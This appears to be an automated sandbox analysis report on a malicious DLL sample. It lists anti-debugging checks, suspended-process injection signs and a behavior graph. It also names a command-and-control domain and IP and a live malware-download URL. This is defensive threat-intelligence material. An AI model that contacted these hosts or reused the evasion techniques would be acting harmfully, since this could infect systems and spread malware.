Source: rundll32.exe, 00000005.00000002.3372854058.0000000008AAE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3372854058.0000000008ADF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3372962854.0000000008128000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3372962854.0000000008151000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3374164503.0000000007B3D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3374164503.0000000007B07000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3373357071.0000000008FB1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3373357071.0000000008F7E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.00000000091DA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.0000000009209000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3372381342.000000000884C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: rundll32.exe, 0000000C.00000002.3373542181.00000000091DA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWH
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6BEE53EE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6BEE53EE
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6BEF4AF5 GetProcessHeap, 0_2_6BEF4AF5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6BEE53EE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6BEE53EE
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6BEE4EDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6BEE4EDC
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6BEEDCFD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6BEEDCFD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6FE64EDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_6FE64EDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6FE6DCFD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_6FE6DCFD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6FE653EE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_6FE653EE

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 131.153.206.231 443
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LLD5HDX0PS.dll",#1 Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6BEE55EB cpuid 0_2_6BEE55EB
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6BEE503D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_6BEE503D
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1500944 Sample: LLD5HDX0PS.dll Startdate: 29/08/2024 Architecture: WINDOWS Score: 84 31 rammenale.com 2->31 35 Antivirus detection for URL or domain 2->35 37 Multi AV Scanner detection for submitted file 2->37 39 Sigma detected: rundll32 run dll from internet 2->39 41 2 other signatures 2->41 9 loaddll32.exe 1 2->9         started        signatures3 process4 process5 11 rundll32.exe 9->11         started        14 cmd.exe 1 9->14         started        16 rundll32.exe 9->16         started        18 2 other processes 9->18 signatures6 43 System process connects to network (likely due to code injection or exploit) 11->43 20 rundll32.exe 14->20         started        22 rundll32.exe 12 16->22         started        24 rundll32.exe 12 16->24         started        process7 process8 26 rundll32.exe 20->26         started        29 rundll32.exe 20->29         started        dnsIp9 33 rammenale.com 131.153.206.231, 443, 49712, 49713 SS-ASHUS United States 26->33
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
131.153.206.231
 rammenale.com United States
19437 SS-ASHUS true

Contacted Domains

Name IP Active
rammenale.com 131.153.206.231 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://rammenale.com/for2/regit.tmp true
  • Avira URL Cloud: malware
 unknown